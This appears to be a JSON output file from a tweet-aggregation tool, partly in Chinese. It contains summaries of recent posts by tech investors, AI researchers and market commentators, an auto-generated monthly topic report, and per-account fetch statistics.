clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://nitter.net/HarryStebbings/status/2048756619622707452#m)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://nitter.net/HarryStebbings/status/2048531257399664920#m)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://nitter.net/HarryStebbings/status/2048486182904852537#m)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://nitter.net/HarryStebbings/status/2048418806867870115#m)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://nitter.net/HarryStebbings/status/2048400836024283246#m)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://nitter.net/HarryStebbings/status/2047792195868967172#m)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://nitter.net/HarryStebbings/status/2047693043080261672#m)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://nitter.net/HarryStebbings/status/2047461264998478113#m)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://nitter.net/HarryStebbings/status/2047426032840634830#m)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://nitter.net/HarryStebbings/status/2047413285675290984#m)\n\n**[2026-04-23T17:48:00+00:00]**\n> Does the $60BN Cursor Deal Make Sense: \"It actually makes sense when you look at what each side lacks. One has explosive revenue but weak margins due to compute and model costs. The other has massive…\n[原文链接](https://nitter.net/HarryStebbings/status/2047371926335857036#m)\n\n**[2026-04-23T16:53:42+00:00]**\n> It is a very expensive desire to be a value investor today. It is much easier to be a momentum investor, that is for sure.\n[原文链接](https://nitter.net/HarryStebbings/status/2047358263868436791#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF Youtube 👉 https://youtu.be/s61XVZAt5ns Apple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acqui…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316269465006363#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> This is the big f**king deal. Cursor acquired for $60BN by xAI I sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week: - Anthropic Hits $1TRN in S…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316267858645088#m)\n\n**[2026-04-22T13:07:07+00:00]**\n> I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: 1. Nik Storonsky (Revolut) 2. @alanchanguk (Fuse Energy) 3. Adam Foroughi (AppLovin) 4. @awxjack (…\n[原文链接](https://nitter.net/HarryStebbings/status/2046938853445959738#m)\n\n**[2026-04-21T20:17:56+00:00]**\n> I have interviewed 1,000 CEOs of the largest companies over the last 10 years. Adam Foroughi is top 5 I have ever met. Easily. AppLovin Market Cap: $160BN Revenue: $5.48BN EBITDA per Head: $10M There…\n[原文链接](https://nitter.net/HarryStebbings/status/2046684883494600911#m)\n\n**[2026-04-21T15:37:00+00:00]**\n> In a world of agents, how do software providers prevent themselves from becoming valueless databases? \"The value proposition has to be: 1. How good are your APIs? 2. How well designed are they 3. Are…\n[原文链接](https://nitter.net/HarryStebbings/status/2046614183513604299#m)\n\n---\n\n### ✅ @jason — Jason Calacanis(19 条)\n\n**[2026-04-27T15:03:32+00:00]**\n> Best accounts for following Austin air quality? @grok\n[原文链接](https://nitter.net/Jason/status/2048780089295302690#m)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://nitter.net/Jason/status/2048580651985604783#m)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://nitter.net/Jason/status/2048487905543237675#m)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://nitter.net/Jason/status/2048465651723882972#m)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://nitter.net/Jason/status/2048463405590225173#m)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://nitter.net/Jason/status/2048450286902235560#m)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://nitter.net/Jason/status/2048437340218044499#m)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://nitter.net/Jason/status/2048436081725464959#m)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://nitter.net/nordin_eth/status/2048399674269213067#m)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://nitter.net/Jason/status/2048249992163242220#m)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://nitter.net/Jason/status/2048247267182658004#m)\n\n**[2026-04-26T03:40:08+00:00]**\n> Heroes 🫡\n[原文链接](https://nitter.net/Jason/status/2048245718171648271#m)\n\n**[2026-04-25T21:25:29+00:00]**\n> x.com/i/spaces/1nGeLyjZrkvKX\n[原文链接](https://nitter.net/Jason/status/2048151434928017429#m)\n\n**[2026-04-25T19:06:45+00:00]**\n> nightmare blunt rotation\n[原文链接](https://nitter.net/Jason/status/2048116521436590260#m)\n\n**[2026-04-25T19:06:07+00:00]**\n> today #knicks @mikal_bridges to 6th man/leads the bench in scoring Knicks play @23savage____ 26 minutes, he has 5 offensive boards We're up 20+ points in the second half @ATLHawks backs broken; they …\n[原文链接](https://nitter.net/Jason/status/2048116362766127514#m)\n\n**[2026-04-25T17:57:08+00:00]**\n> RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for in…\n[原文链接](https://nitter.net/twistartups/status/2048099001782985057#m)\n\n**[2026-04-25T15:11:10+00:00]**\n> RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back. Elon said it. Aravind from Perplexity agrees. And startups are already making it a …\n[原文链接](https://nitter.net/twistartups/status/2048057234865693125#m)\n\n**[2026-04-25T02:02:48+00:00]**\n> WTF are these lunatics up to…\n[原文链接](https://nitter.net/Jason/status/2047858837319774540#m)\n\n**[2026-04-24T23:01:04+00:00]**\n> RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess. LAMAT is fixing the chaos. It's a marketplace that lets orga…\n[原文链接](https://nitter.net/LAUNCH/status/2047813100091449428#m)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(13 条)\n\n**[2026-04-27T13:50:42+00:00]**\n> 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quick…\n[原文链接](https://nitter.net/charliebilello/status/2048761760971096534#m)\n\n**[2026-04-27T13:16:36+00:00]**\n> The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s\n[原文链接](https://nitter.net/charliebilello/status/2048753179471323584#m)\n\n**[2026-04-27T13:08:19+00:00]**\n> With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjI…\n[原文链接](https://nitter.net/charliebilello/status/2048751094671585397#m)\n\n**[2026-04-27T12:53:00+00:00]**\n> RT by @charliebilello: Wondering which month is the best time to start investing? The right answer is any month. Just start!\n[原文链接](https://nitter.net/PeterMallouk/status/2048747238986305979#m)\n\n**[2026-04-26T16:18:48+00:00]**\n> RT by @charliebilello: Does a government shutdown negatively impact the stock market? No. The S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown w…\n[原文链接](https://nitter.net/charliebilello/status/2048436641451155650#m)\n\n**[2026-04-26T15:10:21+00:00]**\n> RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://nitter.net/charliebilello/status/2048419415222259820#m)\n\n**[2026-04-26T14:19:13+00:00]**\n> RT by @charliebilello: The stock market is at an all-time high. Credit spreads are near all-time lows. And inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per …\n[原文链接](https://nitter.net/charliebilello/status/2048406550897729561#m)\n\n**[2026-04-26T14:00:02+00:00]**\n> RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average…\n[原文链接](https://nitter.net/charliebilello/status/2048401720540061794#m)\n\n**[2026-04-26T13:45:00+00:00]**\n> RT by @charliebilello: Global Inflation Rates are on the RISE... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s\n[原文链接](https://nitter.net/charliebilello/status/2048397937156518387#m)\n\n**[2026-04-26T13:30:00+00:00]**\n> RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s\n[原文链接](https://nitter.net/charliebilello/status/2048394162366533935#m)\n\n**[2026-04-26T13:14:49+00:00]**\n> RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://nitter.net/charliebilello/status/2048390341221404827#m)\n\n**[2026-04-25T19:55:14+00:00]**\n> RT by @charliebilello: New video is up: 📈The Week in Charts - breaking down the most important charts and themes in markets... https://www.youtube.com/watch?v=p5e0ThPjIAg\n[原文链接](https://nitter.net/charliebilello/status/2048128721286992166#m)\n\n**[2026-04-25T13:31:00+00:00]**\n> RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett\n[原文链接](https://nitter.net/PeterMallouk/status/2048032027513864212#m)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://nitter.net/CryptoCred/status/2047079463750377958#m)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @svwang1 — 王川(硅谷)(6 条)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://nitter.net/Svwang1/status/2047858045057909226#m)\n\n**[2026-04-24T15:45:26+00:00]**\n> 投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。 投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。\n[原文链接](https://nitter.net/Svwang1/status/2047703469063377001#m)\n\n**[2026-04-24T00:27:47+00:00]**\n> R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。\n[原文链接](https://nitter.net/Svwang1/status/2047472537488302502#m)\n\n**[2026-04-24T00:19:18+00:00]**\n> 多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。\n[原文链接](https://nitter.net/Svwang1/status/2047470402725921150#m)\n\n**[2026-04-20T21:42:30+00:00]**\n> 很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。\n[原文链接](https://nitter.net/Svwang1/status/2046343776378257515#m)\n\n**[2026-04-20T21:13:36+00:00]**\n> 很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。\n[原文链接](https://nitter.net/Svwang1/status/2046336504407142606#m)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://nitter.net/liuliu/status/2047527371486658814#m)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://nitter.net/liuliu/status/2047374234004115719#m)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://nitter.net/liuliu/status/2046986486629986435#m)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T16:13:14.007052+00:00\n**分析账号**: 27个 | **活跃账号**: 20个 | **推文总量**: 257条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:171 条\n- **模型能力**:49 条\n- **交易与市场**:16 条\n- **投融资与并购**:13 条\n- **算力与芯片**:8 条\n\n## 三、活跃账号 Top10\n\n- @GaryMarcus: 20 条\n- @sama: 20 条\n- @paulg: 20 条\n- @pmarca: 20 条\n- @eladgil: 20 条\n- @jason: 19 条\n- @HarryStebbings: 19 条\n- @DavidSacks: 19 条\n- @ylecun: 19 条\n- @elonmusk: 18 条\n\n## 四、代表性推文\n\n- @AndrewYNg | 2026-04-27T15:58:13+00:00\n - AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faste…\n - https://nitter.net/AndrewYNg/status/2048793852702757151#m\n- @GaryMarcus | 2026-04-27T15:50:31+00:00\n - If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, thos…\n - https://nitter.net/GaryMarcus/status/2048791912149295182#m\n- @GaryMarcus | 2026-04-27T15:33:34+00:00\n - R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n - https://nitter.net/GaryMarcus/status/2048787646206677207#m\n- @GaryMarcus | 2026-04-27T15:31:37+00:00\n - This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and o…\n - https://nitter.net/GaryMarcus/status/2048787157536653627#m\n- @elonmusk | 2026-04-27T15:15:09+00:00\n - If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n - https://nitter.net/elonmusk/status/2048783014075777369#m\n- @jason | 2026-04-27T15:03:32+00:00\n - Best accounts for following Austin air quality? @grok\n - https://nitter.net/Jason/status/2048780089295302690#m\n- @elonmusk | 2026-04-27T14:53:45+00:00\n - Excellent point\n - https://nitter.net/elonmusk/status/2048777628019032335#m\n- @GaryMarcus | 2026-04-27T14:27:36+00:00\n - yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to…\n - https://nitter.net/GaryMarcus/status/2048771044987777428#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-4…\n - https://nitter.net/HarryStebbings/status/2048764743205134644#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is …\n - https://nitter.net/HarryStebbings/status/2048764741435179442#m\n- @charliebilello | 2026-04-27T13:50:42+00:00\n - 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending th…\n - https://nitter.net/charliebilello/status/2048761760971096534#m\n- @JeffDean | 2026-04-27T13:40:08+00:00\n - The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conve…\n - https://nitter.net/JeffDean/status/2048759102390899142#m\n- @GaryMarcus | 2026-04-27T13:32:43+00:00\n - ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT a…\n - https://nitter.net/GaryMarcus/status/2048757233174122827#m\n- @HarryStebbings | 2026-04-27T13:30:16+00:00\n - Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. A…\n - https://nitter.net/HarryStebbings/status/2048756619622707452#m\n- @soumithchintala | 2026-04-27T13:29:14+00:00\n - This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternat…\n - https://nitter.net/soumithchintala/status/2048756358820827564#m\n- @sama | 2026-04-27T13:24:26+00:00\n - we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.…\n - https://nitter.net/sama/status/2048755148361707946#m\n- @charliebilello | 2026-04-27T13:16:36+00:00\n - The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s\n - https://nitter.net/charliebilello/status/2048753179471323584#m\n- @sama | 2026-04-27T13:09:30+00:00\n - this is so good: https://paulgraham.com/kids.html\n - https://nitter.net/sama/status/2048751392031203544#m\n- @charliebilello | 2026-04-27T13:08:19+00:00\n - With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX Video: https://www.youtube.c…\n - https://nitter.net/charliebilello/status/2048751094671585397#m\n- @charliebilello | 2026-04-27T12:53:00+00:00\n - RT by @charliebilello: Wondering which month is the best time to start investing? The right answer is any month. Just start!\n - https://nitter.net/PeterMallouk/status/2048747238986305979#m\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_162742.json b/data/x_brief/history/20260427_162742.json new file mode 100644 index 0000000..bf691c2 --- /dev/null +++ b/data/x_brief/history/20260427_162742.json @@ -0,0 +1,3123 @@ +{ + "generated_at": "2026-04-27T16:26:46.682458+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "liuliu", + "name": "刘进" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 258 + }, + "period": { + "days": 7, + "start_utc": "2026-04-20T16:26:13.977139+00:00", + "end_utc": "2026-04-27T16:26:46.682458+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 27, + "active_accounts": 21, + "total_tweets": 258, + "failed_accounts": 0, + "source_hits": { + "nitter": 26 + }, + "source_errors": {} + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 11, + "error": "", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 13, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 \n\nFrom hill country ranches to Austin in ten minutes?! \n\nIf you could buy one for $2m, or lease for $5k a month, and commute into a city from the burbs?!? Wild. https://x.com/shaig/status/2048771337687101850/video/1", + "url": "https://nitter.net/Jason/status/2048797572014207114#m", + "published_at": "2026-04-27T16:13:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "10 minutes from manhattan to jfk is a game changer… \n\n… but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! \n\nImagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 https://x.com/shaig/status/2048771337687101850/video/1", + "url": "https://nitter.net/Jason/status/2048796982227972344#m", + "published_at": "2026-04-27T16:10:40+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": 